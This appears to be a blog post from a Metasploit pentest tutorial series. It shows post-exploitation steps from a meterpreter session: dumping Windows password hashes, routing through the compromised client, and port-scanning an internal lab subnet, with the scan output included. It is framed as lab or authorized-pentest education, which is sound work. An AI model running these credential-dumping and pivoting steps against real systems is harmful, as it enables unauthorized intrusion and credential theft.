The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion
PreambleThis exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement
The following series of posts is going to change a little bit. We will still be walking through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server, but some of the detours I was planning on taking won’t happen. Vivek from securitytube.net has done an excellent series of video tutorials called the Metasploit Megaprimer and did a much better job of explaining the features of Meterpreter. Please goto securitytube.net and have a look
Background
When last we left, we had just launced a meterpreter session on our internal client.
Process
So now that we have a toe hold, let’s explore. First things first, I am going to grab the password hashes from the client machine. For a detailed explantion of Windows password hashing, see ironegeek.com’s password exploitation class. Depending on the exploit used and the account the exploit was run under you may have to do a
meterpreter>use priv
meterpreter>hashdump
The hashes will be displayed on the screen. For now, copy and paste them into a file for later use.
Let’s setup the client to allow us to use to scan other devices on the internal network.
First let’s see what the internal network is like
meterpreter>route
Network routes
============== Subnet Netmask Gateway
—— ——- ——-
0.0.0.0 0.0.0.0 10.13.37.1
10.13.37.0 255.255.255.0 10.13.37.149
10.13.37.149 255.255.255.255 127.0.0.1
10.255.255.255 255.255.255.255 10.13.37.149
127.0.0.0 255.0.0.0 127.0.0.1
Now to use it in Metasploit, press CTRL-Z and select Y to background the session
Next, we will setup Metasploit to use the client meterpreter session as a route
meterpreter>route add 10.13.37.0 mask 255.255.255.0 4 ip subnet network mask meterpreter session
Now lets do a scan: (note: not all scans or exploits will work through this route.)
We will use the tcp portscan
use auxillary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 21-25,80,137-139,443-445,3389 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 10.13.37.1-254 yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output
Note: When doing your initial scan, it is best to limit your ports. Once you have some responses, you can scan more ports on a particual client if nescessary.
msf auxiliary(tcp) >exploit
[*] 10.13.37.1:21 – TCP OPEN
[*] 10.13.37.1:80 – TCP OPEN
[*] Scanned 026 of 254 hosts (010% complete)
[*] Scanned 051 of 254 hosts (020% complete)
[*] Scanned 077 of 254 hosts (030% complete)
[*] Scanned 102 of 254 hosts (040% complete)
[*] Scanned 127 of 254 hosts (050% complete)
[*] 10.13.37.130:80 – TCP OPEN
[*] 10.13.37.130:25 – TCP OPEN
[*] 10.13.37.130:139 – TCP OPEN
[*] 10.13.37.130:443 – TCP OPEN
[*] 10.13.37.130:445 – TCP OPEN
[*] 10.13.37.130:3389 – TCP OPEN[*] Scanned 153 of 254 hosts (060% complete)
[*] Scanned 178 of 254 hosts (070% complete)
[*] Scanned 204 of 254 hosts (080% complete)
[*] Scanned 229 of 254 hosts (090% complete)
[*] 10.13.37.242:22 – TCP OPEN
[*] 10.13.37.242:80 – TCP OPEN
[*] 10.13.37.242:139 – TCP OPEN
[*] 10.13.37.242:445 – TCP OPEN
[*] 10.13.37.244:135 – TCP OPEN
[*] 10.13.37.244:139 – TCP OPEN
[*] 10.13.37.244:445 – TCP OPEN
[*] 10.13.37.245:22 – TCP OPEN
[*] 10.13.37.245:23 – TCP OPEN
[*] 10.13.37.245:21 – TCP OPEN
[*] 10.13.37.245:25 – TCP OPEN
[*] 10.13.37.245:80 – TCP OPEN
[*] 10.13.37.245:139 – TCP OPEN
[*] 10.13.37.245:445 – TCP OPEN
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed
Next Steps
Selecting the next target, creating a “backdoor”…maybe I will also spend some time making these posts look better too…..